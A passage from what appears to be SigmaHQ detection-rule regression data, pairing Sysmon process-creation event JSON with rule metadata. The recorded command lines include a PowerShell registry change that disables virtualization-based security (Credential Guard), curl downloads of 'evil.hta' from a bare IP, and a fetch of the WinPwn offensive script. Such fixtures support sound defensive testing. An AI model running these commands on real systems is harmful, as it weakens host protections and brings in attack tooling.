\"SHA1=061B747FBA99B050D8874167AAD6D1D790F8A3A8,MD5=7E13A7EA7BD3601760E3838D99E31710,SHA256=D7714ECAE976F14B3AFA409FF5A3616E8D6D0CCE8269E611D7835A7C12235D6B,IMPHASH=AFF4D1EA89D0D66F7D04180143E61D12\",\n      \"ParentProcessGuid\": \"5AA13A44-08B2-68FD-2136-000000004002\",\n      \"ParentProcessId\": 3204,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml",
    "content": "id: 6e70bb8b-561e-4af4-bad6-f582c656d047\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 056c7317-9a09-4bd4-9067-d051312752ea\n      title: Powershell Executed From Headless ConHost Process\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/c17d47b7-dcd6-4109-87eb-d1817bd4cbc9.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-26T06:45:49.034405Z\"\n        }\n      },\n      \"EventRecordID\": 23573,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3484,\n          \"ThreadID\": 3424\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-26 06:45:49.010\",\n      \"ProcessGuid\": \"0197231E-2F1D-694E-F304-000000000A00\",\n      \"ProcessId\": 12232,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"FileVersion\": \"10.0.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows PowerShell\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"PowerShell.EXE\",\n      \"CommandLine\": \"\\\"C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -c \\\"Set-ItemProperty -Path \\\"HKLM:Software\\\\Policies\\\\Microsoft\\\\Windows\\\\DeviceGuard\\\" -Name \\\"EnableVirtualizationBasedSecurity\\\" -Value 0\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Windows\\\\System32\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      
\"LogonGuid\": \"0197231E-DDAE-694E-10B6-120000000000\",\n      \"LogonId\": \"0x12b610\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=1736263E02468939F808C0528E8DBB7E,SHA256=1F9FFC2227F8DEA8B771D543C464CF8166C22A39420A5322B5892A640C4B34B6,IMPHASH=68A9FF9C8D0D4655E46E1A7A190A41D2\",\n      \"ParentProcessGuid\": \"00000000-0000-0000-0000-000000000000\",\n      \"ParentProcessId\": 10996,\n      \"ParentImage\": \"-\",\n      \"ParentCommandLine\": \"-\",\n      \"ParentUser\": \"-\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/info.yml",
    "content": "id: f96a3ce2-ae73-4171-8877-71ccf1da7ce5\ndescription: N/A\ndate: 2025-12-26\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: c17d47b7-dcd6-4109-87eb-d1817bd4cbc9\n      title: Windows Credential Guard Registry Tampering Via CommandLine\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/c17d47b7-dcd6-4109-87eb-d1817bd4cbc9.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:22:12.568940Z\"\n        }\n      },\n      \"EventRecordID\": 21497,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:22:12.498\",\n      \"ProcessGuid\": \"0197231E-6314-693A-D112-000000000800\",\n      \"ProcessId\": 11000,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl.exe  --cookie-jar cookie \\\"http://example.com\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\Sysmon\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-4C14-030000000000\",\n      \"LogonId\": \"0x3144c\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-BDEA-6937-AB0C-000000000800\",\n      \"ParentProcessId\": 3476,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml",
    "content": "id: d7f159c3-db76-4e39-b677-c0958f5f82b8\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 5a6e1e16-07de-48d8-8aae-faa766c05e88\n      title: Potential Cookies Session Hijacking\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:17:19.772545Z\"\n        }\n      },\n      \"EventRecordID\": 21475,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:17:19.636\",\n      \"ProcessGuid\": \"0197231E-61EF-693A-C812-000000000800\",\n      \"ProcessId\": 6400,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl.exe  -H \\\"User-Agent: EvilAgent\\\" http://example.com\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\Sysmon\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-4C14-030000000000\",\n      \"LogonId\": \"0x3144c\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-BDEA-6937-AB0C-000000000800\",\n      \"ParentProcessId\": 3476,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml",
    "content": "id: 6428e458-fe2e-4936-accb-aebd0bcc8e35\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 85de1f22-d189-44e4-8239-dc276b45379b\n      title: Curl Web Request With Potential Custom User-Agent\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T07:02:39.732592Z\"\n        }\n      },\n      \"EventRecordID\": 21767,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 07:02:39.718\",\n      \"ProcessGuid\": \"0197231E-6C8F-693A-2613-000000000800\",\n      \"ProcessId\": 17752,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  --output hello.txt https://12.34.56.78/hack/evil.txt\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": 
\"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml",
    "content": "id: 6aac357c-fe1d-4ca0-82e2-df626f71e838\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 9cc85849-3b02-4cb5-b371-3a1ff54f2218\n      title: File Download From IP URL Via Curl.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:34:20.042883Z\"\n        }\n      },\n      \"EventRecordID\": 21588,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:34:19.983\",\n      \"ProcessGuid\": \"0197231E-65EB-693A-F112-000000000800\",\n      \"ProcessId\": 14440,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  --output benign.hta \\\"https://12.34.56.78/hack/evil.hta\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": 
\"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml",
    "content": "id: 0f1b33fc-f97e-4469-a9ec-32ffb436f490\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043\n      title: Suspicious File Download From IP Via Curl.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:41:38.130858Z\"\n        }\n      },\n      \"EventRecordID\": 21642,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:41:38.096\",\n      \"ProcessGuid\": \"0197231E-67A2-693A-FF12-000000000800\",\n      \"ProcessId\": 9656,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  -O \\\"https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": 
\"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml",
    "content": "id: 68e8f5c3-5a3b-4878-82d3-24d961eb219b\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb\n      title: Suspicious File Download From File Sharing Domain Via Curl.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:43:20.070938Z\"\n        }\n      },\n      \"EventRecordID\": 21651,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:43:20.052\",\n      \"ProcessGuid\": \"0197231E-6808-693A-0413-000000000800\",\n      \"ProcessId\": 17792,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  --insecure http://example.com\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": 
\"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml",
    "content": "id: ef93f624-2b41-41ee-9596-298d3158acfb\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec\n      title: Insecure Transfer Via Curl.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:45:56.284330Z\"\n        }\n      },\n      \"EventRecordID\": 21680,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:45:56.239\",\n      \"ProcessGuid\": \"0197231E-68A4-693A-0713-000000000800\",\n      \"ProcessId\": 13700,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  --proxy-insecure -p -x http://127.0.0.1:1234 --silent -v --show-error http://127.0.0.1:888/echo\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": 
\"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml",
    "content": "id: 11dd9a12-467e-4c13-b928-7c3aea60f59f\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 2c1486f5-02e8-4f86-9099-b97f2da4ed77\n      title: Insecure Proxy/DOH Transfer Via Curl.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json",
